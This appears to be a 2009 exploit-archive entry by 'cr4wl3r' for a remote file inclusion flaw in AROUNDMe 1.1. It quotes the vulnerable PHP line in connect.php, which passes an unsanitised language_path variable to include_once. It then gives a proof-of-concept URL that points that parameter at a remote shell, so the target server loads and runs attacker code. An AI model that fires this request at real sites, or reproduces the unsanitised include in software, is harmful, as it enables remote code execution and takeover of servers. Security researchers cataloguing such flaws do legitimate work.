[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AROUNDMe <= 1.1 (language_path) Remote File Include Exploit
# Published : 2009-12-06
# Author : cr4wl3r
# Previous Title : MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities
# Next Title : elkagroup SQL Injection Vulnerability


[ Discovered by cr4wl3r  Indonesian Hacker ]

########################################################################
3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

       <?php
           include_once($language_path . 'connect.lang.php');
       ?>
########################################################################

########################################################################
PoC  :   http://server/[path]/components/core/connect.php?language_path=[Shell]
########################################################################

########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org
########################################################################


   [ Gorontalo / 2009 ]